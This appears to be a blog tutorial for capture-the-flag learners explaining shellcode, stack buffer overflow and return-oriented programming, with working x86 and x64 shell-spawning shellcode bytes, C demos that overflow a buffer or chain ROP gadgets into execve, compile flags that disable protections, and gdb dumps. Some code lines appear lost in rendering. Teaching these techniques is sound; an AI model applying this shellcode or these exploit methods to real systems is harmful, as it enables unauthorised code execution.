Shellcode, Buffer Overflow and Return Oriented Progamming



In this post, I will simply introduce the shellcode, buffer overflow and return-oriented-programming.


Usually, shellcode refers to a short sequence of assembly code to generate a shell for attacker. We display the shellcode under X86 and X64 system respectively [1][2].

//gcc -fno-stack-protector -z execstack shellx86.c -o shellx86  -no-pie -m32

unsigned char code[] = "\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
int main()
	int (*ret)() = (int(*)())code;

//gcc -fno-stack-protector -z execstack shellx64.c -o shellx64  -no-pie

unsigned char code[] = "\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05";
int main()
	int (*ret)()=(int(*)()) code;

To show how those two shellcodes work, we dump the memory of these two shellcodes and show the status of register.
For shellcode on X86 platform:

0x804a018 <code>:	xor    %eax,%eax
0x804a01a <code>:	cltd   
0x804a01b <code>:	push   %eax
0x804a01c <code>:	push   $0x68732f2f
0x804a021 <code>:	push   $0x6e69622f
0x804a026 <code>:	mov    %esp,%ebx
0x804a028 <code>:	push   %eax
0x804a029 <code>:	push   %ebx
0x804a02a <code>:	mov    %esp,%ecx
0x804a02c <code>:	mov    $0xb,%al
0x804a02e <code>:	int    $0x80

Breakpoint 2, 0x0804a02e in code ()
(gdb) p/x $eax
$1 = 0xb
(gdb) p/x $ebx
$2 = 0xffffd2d0
(gdb) x/s $ebx
0xffffd2d0:	"/bin//sh"
(gdb) p/x $ecx
$3 = 0xffffd2c8
(gdb) x/4wx $ecx
0xffffd2c8:	0xffffd2d0	0x00000000	0x6e69622f	0x68732f2f
(gdb) p/x $edx
$4 = 0x0

At 0x804a02e where we are about to call syscall, $eax is used to store the syscall number for execve, $ebx is used to store the buffer address of “/bin//sh”, $ecx is used to store the argument buffer, $edx is 0.

For shellcode on X64 platform:

0x601030 <code>:	mul    %esi
0x601032 <code>:	push   %rdx
0x601033 <code>:	movabs $0x68732f2f6e69622f,%rbx
0x60103d <code>:	push   %rbx
0x60103e <code>:	lea    (%rsp),%rdi
0x601042 <code>:	mov    $0x3b,%al
0x601044 <code>:	syscall 

Breakpoint 2, 0x0000000000601044 in code ()
(gdb) p/x $rax
$1 = 0x3b
(gdb) p/x $rdi
$2 = 0x7fffffffe148
(gdb) x/s $rdi
0x7fffffffe148:	"/bin//sh"
(gdb) p/x $rsi
$3 = 0x7fffffffe258
(gdb) x/2gx $rsi
0x7fffffffe258:	0x00007fffffffe53f	0x0000000000000000
(gdb) p/x $rdx
$4 = 0x0

At 0x601044 where we are about to call syscall, $rax is used to store the syscall number for execve, $rdi is used to store the buffer address of “/bin//sh”, $esi is used to store the environment variable, $rdx is 0.

Stack buffer overflow

Stack buffer overflow is usually used to corrupt the return value stored in stack.

//gcc bof.c -o bof -no-pie -z execstack

int main()
	unsigned char victim[20];
	unsigned char code[] = "\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\x48\x31\xf6\x48\x31\xd2\xb0\x3b\x0f\x05";
	printf("executeable code at %p\n", code);
	char c1 = (unsigned long)(code) & 0xff;
	char c2 = ((unsigned long)(code) & 0xff00)>>8;
	char c3 = ((unsigned long)(code) & 0xff0000)>>16;
	char c4 = ((unsigned long)(code) & 0xff000000)>>24;
	char c5 = ((unsigned long)(code) & 0xff00000000)>>32;
	char c6 = ((unsigned long)(code) & 0xff0000000000)>>40;
	snprintf(victim, 80, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%c%c%c%c%c%c%c%c%c", c1, c2, c3, c4, c5, c6, 0, 0 );
	return 0;

The sample code above gives on how buffer overflow vulnerability corrupts the return value in stack and executes the shellcode in the end. One thing to note that the shellcode used here is slightly different from the shellcode given in previous section.

Return Oriented Programming

Return Oriented Programming (ROP) is a technique in code reuse attack.

//gcc rop.c -o rop -no-pie 

int main()
	int rv;
	unsigned long victim[1];

	unsigned long *gadget = malloc(0x4000);
	printf("gadget address: %p", gadget);
	rv = mprotect((void*)(gadget)-0x10, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);
	if(rv < 0)
		perror("mprotect: ");
	unsigned long base = (unsigned long)gadget;
	victim[5] = base;
	victim[6] = base + 0x1000;

	gadget[0] = 0xc35c;
	gadget[1] = 0xc35f;
	gadget[2] = 0xc35e;
	gadget[3] = 0xc35a;
	gadget[4] = 0xc358;
	gadget[5] = 0x050f;

	gadget[0x200] = base + 8;
	gadget[0x201] = base + 0x2000; //rdi
	gadget[0x202] = base + 0x10; 
	gadget[0x203] = 0;        //rsi
	gadget[0x204] = base + 0x18; 
	gadget[0x205] = 0;        //rdx
	gadget[0x206] = base + 0x20; 
	gadget[0x207] = 0x3b;
	gadget[0x208] = base + 0x28;

	gadget[0x400] = 0x68732f2f6e69622f;

	return 0;

To give a better understanding on how the ROP works above, I dump the memory layout at the time of syscall for explanation.

(gdb) p/x $rax
$1 = 0x3b
(gdb) p/x $rdi
$2 = 0x604010
(gdb) x/s $rdi
0x604010:	"/bin//sh"
(gdb) p/x $rsi
$3 = 0x0
(gdb) p/x $rdx
$4 = 0x0
(gdb) x/10gx 0x603010
0x603010:	0x0000000000602018	0x0000000000604010
0x603020:	0x0000000000602020	0x0000000000000000
0x603030:	0x0000000000602028	0x0000000000000000
0x603040:	0x0000000000602030	0x000000000000003b
0x603050:	0x0000000000602038	0x0000000000000000
(gdb) x/2i 0x602010
   0x602010:	pop    %rsp
   0x602011:	retq   
(gdb) x/2i 0x602018
   0x602018:	pop    %rdi
   0x602019:	retq   
(gdb) x/2i 0x602020
   0x602020:	pop    %rsi
   0x602021:	retq   
(gdb) x/2i 0x602028
   0x602028:	pop    %rdx
   0x602029:	retq   
(gdb) x/2i 0x602030
   0x602030:	pop    %rax
   0x602031:	retq   
(gdb) x/i 0x602038
=> 0x602038:	syscall

In the given sample code, we simplify the buffer overflow vulnerability by overwriting the return address to 0x602010 directly.
Gadget pop rsp; ret works as pivot gadget to change rsp to 0x603010. The memory layout at 0x603010 is the crafted to a fake stack for chaining rop gadget.
There are 6 rop gadgets in total. Gadget at 0x602010 works as a pivot gadget to change rsp. Gadgets at 0x602018, 0x602020, 0x602028, 0x602030 work as loading gadget to load value into desired register. Gadget at 0x602038 triggers syscall.
In reality, we need to find suitable gadgets in the target binary and available gadgets are not as simple and trivial as given in the sample code.


In this post, I give a simple introduction on shellcode, stack buffer overflow and ROP. Moreover, I show how those things can be combined together to pwn a shell in the end. In real CTF challenges those things are not simple as demonstrated here. Challenges may include alphanumeric shellcode or shadow stack or simple Control Flow Integrity to make things complicated.



Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.